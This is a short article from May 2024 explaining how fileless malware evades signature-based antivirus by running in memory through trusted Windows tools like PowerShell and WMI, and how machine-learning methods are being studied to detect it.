The Fileless present of Malware and its evolving ML based detection, classification and prevention

By Ioannis Kiachidis May 28, 2024

The Fileless present of Malware and its evolving ML based detection, classification and prevention

The main approach for detection and prevention of malware is based upon the concept of file signatures. More specifically, the AV solutions are scanning the system’s storage devices and hash files at process/creation time. Then they compare each of these hashes with their respective curated database which contains signatures of known malware samples. If there is a match then the file is flagged as malicious and subsequent actions take place to contain it. But what could happen if there was some kind of malware that did not rely on a file to accomplish its mission?

During the last decade the Cybersecurity field witnessed the rise and domination of Fileless Malware. Fileless Malware (aka Advanced Volatile Threat – AVT) debuted in 2001 (Code Red worm) and according to Cybersecurity enterprises and institutes, by the end of 2022 around 71% of the attacks employed fileless techniques. The dawn of the present decade came with a surging increase of Fileless Malware detections by a whooping 900% as threat actors eventually came to realise its potential and efficiency. Indicative of the former is the fact that APT groups and threat actors’ operations utilise Fileless Malware.

In contrast to traditional malware, Fileless Malware do not download any files into target system’s storage. Instead, the malicious code is injected directly into memory. The aforementioned is usually accomplished by taking advantage of trusted applications already present in the system (aka LOLBins and LOLScripts i.e. Living-of-the-Land Binaries and Scripts) like PowerShell, WMI and PsExec in Windows OS.

Since there is no file to generate its signature and compare it against a database of signatures of known malware, AV solutions are of little to no use against Fileless Malware. Throughout recent research literature there is variety of proposed solutions to detect, classify and ultimately contain Fileless Malware and most of these solutions utilise modern Machine Learning methods and technologies. The results that some Deep Learning algorithms exhibit are promising and thus it seems apparent that this is the direction that modern solutions shall follow.